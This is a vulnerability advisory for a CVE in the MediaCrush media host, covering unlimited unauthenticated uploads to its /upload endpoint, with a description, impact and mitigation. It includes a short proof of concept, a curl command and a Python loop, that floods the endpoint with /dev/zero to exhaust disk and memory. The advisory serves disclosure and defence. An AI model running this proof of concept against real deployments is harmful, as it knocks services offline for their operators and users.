An issue was discovered in MediaCrush thru 1.0.1 allowing remote unauthenticated attackers to upload arbitrary files of any size to the /upload endpoint.
Vulnerability: Unrestricted File Upload (CWE-434)
CVE ID: CVE-2025-61506
DISCOVRED : 18 september
ASSIGNED : 9 october
Affected Component: mediacrush/upload.py, app.py (Flask upload endpoint)
Affected Versions: All versions (last commit 8f4b2a3f, circa 2014)
Impact: Denial of Service (DoS)
Severity: CVSS 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

## Description

MediaCrush’s /upload endpoint (mediacrush/upload.py) allows unauthenticated attackers to upload arbitrarily large files without size limits, MIME type validation, or rate limiting. This leads to denial of service by exhausting disk storage (default ./storage), overwhelming Redis and Celery workers, and crashing the application. The vulnerability affects all MediaCrush instances (local or network-deployed) due to missing input validation in the Flask-based upload handler. As the project is unmaintained (last update 2014), no fix exists.


## Proof of Concept (PoC)

Set up a local MediaCrush instance (per README: Python 2.7, Flask 0.10.1, Redis, Celery).


Run the app (python app.py) and Celery worker (celery worker -A mediacrush -Q celery,priority).


Execute the following to upload a large file:

`curl -F "file=@/dev/zero" http://localhost:5000/upload`

Or use a Python script for multiple uploads:

`import requests
url = "http://localhost:5000/upload"
for i in range(50):
    with open("/dev/zero", "rb") as f:
        files = {"file": (f"huge{i}.mp4", f, "video/mp4")}
        r = requests.post(url, files=files)
        print(f"Upload {i}: {r.status_code} - ID: {r.json().get('id', 'Failed')}")`



Result: Disk storage (e.g., /tmp/storage) fills, Celery workers crash due to OOM, and new uploads fail (HTTP 500/413). Redis memory usage spikes.


## Impact

Denial of Service: Fills disk, crashes app, prevents new uploads or media serving.


Storage Abuse: Attackers can use MediaCrush as free unlimited storage for malicious files (e.g., pirated content).


Cloud Cost: If storage_folder is cloud-backed (e.g., AWS S3), incurs significant billing.


Affects any self-hosted MediaCrush deployment through version 1.0.1.


## Mitigation

Enforce server-side upload size limits using Flask's MAX_CONTENT_LENGTH configuration and web server (e.g., nginx) client_max_body_size directives. Implement proper file validation and rate limiting to prevent resource exhaustion.

As the project is unmaintained, users should fork and patch or avoid deployment.


## References

MediaCrush Repository: https://github.com/MediaCrush/MediaCrush

CWE-434: https://cwe.mitre.org/data/definitions/434.html

## Notes

Discovered during a bug bounty audit of open-source projects.

No prior CVEs found for MediaCrush (NVD, GitHub advisories searched).

Project unmaintained; no vendor response expected (mediacrush@librelist.com, IRC #mediacrush inactive).
